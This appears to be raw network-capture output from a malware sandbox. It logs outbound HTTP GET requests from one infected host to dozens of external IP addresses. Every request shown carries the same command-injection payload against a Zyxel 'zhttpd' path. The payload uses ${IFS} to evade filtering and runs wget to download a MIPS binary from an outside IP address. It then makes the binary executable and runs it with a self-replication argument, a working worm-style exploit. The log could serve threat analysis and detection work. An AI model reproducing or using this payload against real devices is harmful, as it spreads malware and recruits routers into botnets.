                                    Jan 13, 2024 19:02:25.982743025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2326192.168.2.1334816105.123.183.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982779980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2327192.168.2.1355254111.1.255.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982811928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2328192.168.2.1360850196.132.180.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982861042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2329192.168.2.1349014134.230.45.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982896090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2330192.168.2.1341856192.39.194.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982937098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2331192.168.2.1350122146.228.97.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982959032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2332192.168.2.1356106197.8.210.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982996941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2333192.168.2.1350040135.226.137.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.983043909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2334192.168.2.1359878149.42.18.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.983078003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2335192.168.2.1352588216.211.95.246443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.983143091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2336192.168.2.135577077.161.5.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.983175039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2337192.168.2.1333920173.195.176.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.983211040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2338192.168.2.1360948126.2.245.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.983238935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2339192.168.2.1357826130.216.107.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.983310938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2340192.168.2.1335066222.106.126.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.983352900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2341192.168.2.1360748157.201.208.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.983387947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2342192.168.2.1355710188.55.248.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.983433962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2343192.168.2.133899231.144.116.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.983468056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2344192.168.2.134131888.215.236.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.983498096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2345192.168.2.1340588208.5.222.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.983529091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2346192.168.2.133911058.232.28.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.983577013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2347192.168.2.134725871.220.18.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.983619928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2348192.168.2.133819817.74.116.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.983659983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2349192.168.2.134186236.215.92.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.983710051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2350192.168.2.1342790189.82.55.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.983746052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2351192.168.2.135472458.72.106.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.983783960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2352192.168.2.13329909.23.117.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.983824015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2353192.168.2.134921094.110.129.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.983880043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2354192.168.2.1351598130.120.168.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.983900070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2355192.168.2.1356654113.53.59.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.983937025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2356192.168.2.13550849.13.185.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.983987093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2357192.168.2.1347338161.158.158.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984026909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2358192.168.2.134600052.140.234.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984076023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2359192.168.2.1344754201.246.184.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984116077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2360192.168.2.135185852.170.51.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984155893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2361192.168.2.133752025.131.27.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984172106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2362192.168.2.1340154203.168.80.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984209061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2363192.168.2.1348768157.229.247.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984230042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2364192.168.2.134736481.166.76.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984277964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2365192.168.2.133733223.229.27.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984323025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2366192.168.2.1350352201.110.195.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984365940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2367192.168.2.1337176208.195.150.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984383106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2368192.168.2.135963862.176.224.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984448910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2369192.168.2.1359296130.176.211.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984464884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2370192.168.2.134258618.105.141.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984493971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2371192.168.2.1333642191.220.169.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984513044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2372192.168.2.1358388168.10.237.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984543085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2373192.168.2.1333344138.163.234.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984587908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2374192.168.2.134865471.129.13.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984625101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2375192.168.2.133405050.98.233.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984671116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2376192.168.2.13394022.148.49.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984704018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2377192.168.2.133539084.207.249.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984736919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2378192.168.2.1343058185.55.118.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984778881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2379192.168.2.1346682165.0.202.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984800100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2380192.168.2.1348522202.104.238.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984838963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2381192.168.2.1334952150.159.240.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984886885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2382192.168.2.1341086104.64.7.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984915018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2383192.168.2.1340254162.131.123.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984957933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2384192.168.2.133939893.216.131.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.984997988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2385192.168.2.135094827.254.168.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985030890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2386192.168.2.1344240192.8.121.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985064030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2387192.168.2.1360778112.76.48.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.985112906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2388192.168.2.1337514139.114.162.15443
                                    TimestampBytes transferredDirectionData
